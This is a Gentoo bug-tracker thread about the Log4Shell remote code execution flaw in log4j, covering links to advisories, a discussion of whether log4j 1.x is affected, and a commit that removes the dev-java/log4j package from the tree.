https://www.lunasec.io/docs/blog/log4j-zero-day/ Remote code execution exists in log4j where untrusted input is logged. Patch at URL. POC: https://github.com/tangxiaofeng7/apache-log4j-poc Fix appears to be in 2.15.0, please bump.
I think this only affects 2.x.
(In reply to Sam James from comment #1) > I think this only affects 2.x. https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126 "Hi @yuezk, as far as I can tell, log4j 1.x does not support lookups. [snip] CORRECTION: log4j 1.x contains a JMS Appender which can use JNDI. So I would say that, yes, log4j 1.x is also impacted by this vulnerability (Thank you @garydgregory for pointing this out)."
(In reply to John Helmert III from comment #2) > (In reply to Sam James from comment #1) > > I think this only affects 2.x. > > https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126 > > "Hi @yuezk, as far as I can tell, log4j 1.x does not support lookups. [snip] > CORRECTION: log4j 1.x contains a JMS Appender which can use JNDI. So I would > say that, yes, log4j 1.x is also impacted by this vulnerability (Thank you > @garydgregory for pointing this out)." Well, seems like the impact in 1.x is limited to DoS (maybe?) based on https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301.
(In reply to John Helmert III from comment #3) > (In reply to John Helmert III from comment #2) > > (In reply to Sam James from comment #1) > > > I think this only affects 2.x. > > > > https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126 > > > > "Hi @yuezk, as far as I can tell, log4j 1.x does not support lookups. [snip] > > CORRECTION: log4j 1.x contains a JMS Appender which can use JNDI. So I would > > say that, yes, log4j 1.x is also impacted by this vulnerability (Thank you > > @garydgregory for pointing this out)." > > Well, seems like the impact in 1.x is limited to DoS (maybe?) based on > https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301. Actually, RCE in non-default configuration: https://www.openwall.com/lists/oss-security/2021/12/13/1
The affected package is last-rited, see https://bugs.gentoo.org/829192#c1
The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=e55b6f037bdb41eae1559ecb953865d39a71105e commit e55b6f037bdb41eae1559ecb953865d39a71105e Author: Jakov Smolić <jsmolic@gentoo.org> AuthorDate: 2022-05-04 08:11:29 +0000 Commit: Jakov Smolić <jsmolic@gentoo.org> CommitDate: 2022-05-04 08:13:46 +0000 dev-java/log4j: treeclean Bug: https://bugs.gentoo.org/828657 Bug: https://bugs.gentoo.org/719146 Bug: https://bugs.gentoo.org/829192 Signed-off-by: Jakov Smolić <jsmolic@gentoo.org> dev-java/log4j/Manifest | 1 - dev-java/log4j/log4j-1.2.17-r3.ebuild | 70 ----------------------------------- dev-java/log4j/metadata.xml | 12 ------ profiles/package.mask | 6 --- 4 files changed, 89 deletions(-)
commit e55b6f037bdb41eae1559ecb953865d39a71105e Author: Jakov Smolić <jsmolic@gentoo.org> Date: Wed May 4 10:11:29 2022 +0200 dev-java/log4j: treeclean